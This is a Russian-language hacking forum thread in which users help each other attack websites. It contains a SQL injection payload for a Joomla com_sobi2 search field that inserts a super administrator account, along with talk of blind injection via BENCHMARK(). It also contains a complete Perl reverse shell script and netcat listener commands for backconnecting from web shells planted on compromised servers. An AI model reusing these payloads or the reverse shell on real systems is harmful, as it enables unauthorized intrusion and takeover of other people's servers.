Ваши вопросы по уязвимостям.

SQL

Вообщем такая проблема:
Ввожу этот запрос в MysqlFront все работает создает запись, а если выполняется из кода скрипта то нифига не добавляет, по логам Mysql смотрел запрос проходит как надо но ничего не создает. в чем может проблема быть?

Code:

SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `language` WHERE `langValue` IN('a');INSERT INTO`usr`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrator','admin123','1111','adm')# a') AND `sobi2Section` = 'field_opt'

 

Может быть лучше выложить..этот код php скрипта?

 

Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.html

http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid=26
в поиск ввести

Code:

a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'

Поубирать пробелы надо обяательно

Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.

Code:

SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'

 

Не удалось найти файл, соответствующий указанному идентификатору сессии.

 

mysql_query - выполняет один запрос за раз и не более.

 

Спасибо. Тогда остается только BENCHMARK()

 

Ну судя по приведенному запросу можно выполнить union select - зачем BENCHMARK()? Или данные не выводяться?

 

Нет вывода)
Компонент популярный запощу в уязвимости)

 

Вывода ошибки тоже нет? И страницы совсем никак не отличаются?

 

\
Да)

 

Судя по коду если гверя вернет error то имеется соотвествуюший вывод ошибки:

PHP:

if ($database->getErrorNum()) {
                            trigger_error("DB reports: ".$database->stderr(), E_USER_WARNING);
                        }


можно попробывать more one row, правда сам не смотрел.

 

Напиши запрос полностью а то непоймучто ты предлагаешь)

 

Давай-ка ты сначала нормально разберёшься, а потом будешь постить это в уязвимости джумлы.

Ни кода, ни примера, ни версии, нифига нет. Это не баг, а хрен знает что. Или отредактируй пост нормально, или я его снесу. Разберёшься выложишь

Это что вообще должно означать по твоему?!

 

Найди в своем сниффере файл config.php и обрати внимание на строчку "$image_filename = "ПУТЬ К КАРТИНКЕ";

 

Почему на всех моих веб шеллах не открвается порт для конекта нетката?

И подскажите как юзать неткат в режиме backconnect через дедик



ЗЫ один мембер зашол в тему и ущол ((

 

Возможно на всех серваках, где твои шеллы - фаер, или, что более вероятно, ты пытаешься юзать встроенный в шелл бекконект, что говорит лишь о том, что у тебя паблик шелл, где, как правило, встроенный бекконект работает некорректно. Если же ты юзаешь шелл, написанный одним из участников форума, то задавай соотвествующие вопросы там, где тема про его шелл

ЗЫЖ А еще, возможно, ты просто не умеешь пользоваться неткатом.

Что еще можно ответить на вопрос, в котором "море" нужной инфы - что делал, какой шелл юзал, на какой системе, под какими ограничениями хотя бы визуальными, как неткат запускал и т.д. и т.р.с.п.

 

linux, шелл орбовский. запускал так nc.exe sitename 777

в шелле сделал всё проавильно.

ЗЫ какой шелл для таких целей порекомендуешь?

Давай я тебе в ПМ скину список щеллов и ты их потестиш?

 

Не, не надо, уже были преценденты, плохо кончалось. Лучше вот, пройди в тему автора и задай там свой вопрос:

https://forum.antichat.ru/thread103155.html

Code:

 nc.exe sitename 777

 

Лучше юзай просто бекконект? Например такой:

Code:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Еще у тебя на дедике должен быть так называемый "белый IP", далее ты запускаешь на сервере вышеприведенный скрипт, а на дедике nc.exe -l -v -p 443, еще может быть решением проблемы бекконект на 80 порт, либо 443.
А еще лучше под эти цели юзать не дедик, а vds например, конектишься по ссш, и там открываешь неткат ./nc -l -v -p 443

 

Насколько я помню, открытие порта до 1024 требует прав рута, но это не точно, подзабыл. Попробуй 33333 хотя бы.